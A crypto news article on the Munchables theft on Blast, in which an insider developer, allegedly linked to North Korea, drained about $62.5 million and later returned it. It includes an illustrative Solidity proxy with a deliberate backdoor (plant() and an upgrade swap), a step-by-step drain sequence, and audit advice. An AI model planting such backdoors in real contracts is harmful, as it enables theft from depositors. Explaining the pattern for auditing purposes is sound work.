Solidity developer 0xQuit shared on X that “the Munchables exploit has been planned since deploy.”

In the late hours of Tuesday, the crypto community saw another exploit. Munchables, the Ethereum Layer-2 NFT gaming platform, reported being compromised, via a post on X.

The theft, in which more than $62 million was briefly taken, took a shocking turn once the attacker's identity was established and opened a Pandora's box.

Cryptocurrency Developer Becomes Hacker

Yesterday, Munchables, a gaming platform powered by Blast, suffered a security breach that resulted in the theft of 17,400 ETH, worth around $62.5 million. Immediately after the announcement on X, crypto detective ZachXBT revealed the stolen sum and the address to which the funds had been sent. It was later reported that the theft had been an inside job rather than an outside attack, as one of the project's own developers appeared to be responsible.

The exploit apparently was "not at all complex," since it consisted of simply requesting the stolen funds from the contract. However, it required the attacker to be an authorized party, confirming that the heist was carried out from within the project. After further investigation, 0xQuit concluded that the attack had been planned since the contract was deployed.

The Munchables developer abused the upgradeable nature of the contract to "allot themselves a huge balance of ether before changing the contract implementation to one that looked legitimate." Because the state of an upgradeable proxy persists across implementation changes, the planted balance survived the swap to the clean-looking code. The developer "simply withdrew the balance" once the total value locked (TVL) was high enough. DeFiLlama data shows that before the exploit, Munchables had a TVL of $96.16 million.
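To make the mechanism concrete, the following Solidity is an illustrative example added here by the editor; it is not Munchables' code and does not reproduce the real contracts. It assumes a minimal owner-controlled proxy (hypothetical `Proxy`, `BackdooredVault`, `CleanVault` and `plant()` names) and shows why a balance written by an early, backdoored implementation is still honoured by a later, legitimate-looking one: the mapping lives in the proxy's storage, not in the implementation.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Editor's illustrative example, not the project's code.
// Shared storage layout: every implementation must declare the same slots in
// the same order, because the proxy delegatecalls into them and the state
// (owner, balances) is stored in the proxy, never in the implementation.
abstract contract VaultStorage {
    address public owner;                         // slot 0
    mapping(address => uint256) public balances;  // slot 1
}

// Minimal upgradeable proxy: holds the ether and the state, forwards logic.
contract Proxy is VaultStorage {
    address public implementation;                // slot 2, after shared layout

    constructor(address impl) {
        owner = msg.sender;
        implementation = impl;
    }

    // The "authorized party" the article mentions: only the owner can upgrade.
    function upgradeTo(address impl) external {
        require(msg.sender == owner, "not owner");
        implementation = impl;
    }

    fallback() external payable {
        address impl = implementation;
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }

    receive() external payable {}
}

// Implementation deployed first. plant() credits a balance without any ether
// being deposited; the entry is written into the proxy's storage and therefore
// survives a later upgrade.
contract BackdooredVault is VaultStorage {
    function deposit() external payable { balances[msg.sender] += msg.value; }

    function plant(address who, uint256 amount) external {
        require(msg.sender == owner, "not owner");
        balances[who] = amount;  // hypothetical backdoor: no ether backs this
    }

    function withdraw(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient");
        balances[msg.sender] -= amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Implementation swapped in afterwards. Its verified source looks legitimate:
// there is no plant(). But the planted balance is still in the proxy, so once
// enough real deposits have accumulated, withdraw() pays it out.
contract CleanVault is VaultStorage {
    function deposit() external payable { balances[msg.sender] += msg.value; }

    function withdraw(uint256 amount) external {
        require(balances[msg.sender] >= amount, "insufficient");
        balances[msg.sender] -= amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

// Sequence, all through the proxy address:
//   1. deploy Proxy(address(new BackdooredVault()))
//   2. BackdooredVault(proxy).plant(insider, hugeAmount)
//   3. proxy.upgradeTo(address(new CleanVault()))   // source now reads clean
//   4. users deposit over time; TVL grows
//   5. CleanVault(proxy).withdraw(hugeAmount)       // drains real deposits
```

The practical audit lesson is that reviewing the currently verified implementation is not enough for an upgradeable contract. A reviewer has to walk the proxy's full upgrade history (every implementation address it has ever pointed at) and, independently, reconcile the on-chain storage with the events that should have produced it: if the sum of credited balances exceeds the ether the proxy ever received, a balance was written by something other than a deposit. Who holds the upgrade key matters as much as the code, since a single authorized insider is all this requires.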

Change of Mind or Fear of the Crypto Community?

As ZachXBT suggested, the rogue Munchables developer was North Korean, apparently linked to the Lazarus group. However, the plot thickens, as the blockchain researcher revealed that four different developers hired by the Munchables team were linked to the exploiter, and it seemed like they were all the same person.

These developers recommended each other for work and regularly transferred payments to the same two exchange deposit addresses, funding each other’s wallets. Journalist Laura Shin suggested the possibility that the developers are not the same person but rather different people working for the same entity, the North Korean government.

The CEO of Pixelcraft Studios added that he had made a trial hire of this developer in 2022. During the month that the former Munchables developer worked for them, he exhibited "sketchy" practices. The CEO considers the North Korean link plausible.

Furthermore, he revealed that the modus operandi was similar back then, as the developer tried to get "his friend" hired as well. The CEO of Pixelcraft commented that, at the time, the developer explained that his nickname came from his love of the character Gru from the Despicable Me movies. Ironically, the character in question is a supervillain who spends most of the movie trying to steal the moon.

Whether or not he was trying to steal the moon and failed like Gru, the developer ultimately returned the funds without asking for anything in return. Many users believe this suspicious change of heart was prompted by ZachXBT's deep dive into the attacker's web of lies, and by the threats that followed.

This thriller ends with the cryptocurrency researcher’s response to a now-deleted post. In his response, the detective threatened to destroy the developer and all of his “other North Korean developers who are hard on the chain, their country has another blackout.”

By Audy Castaneda

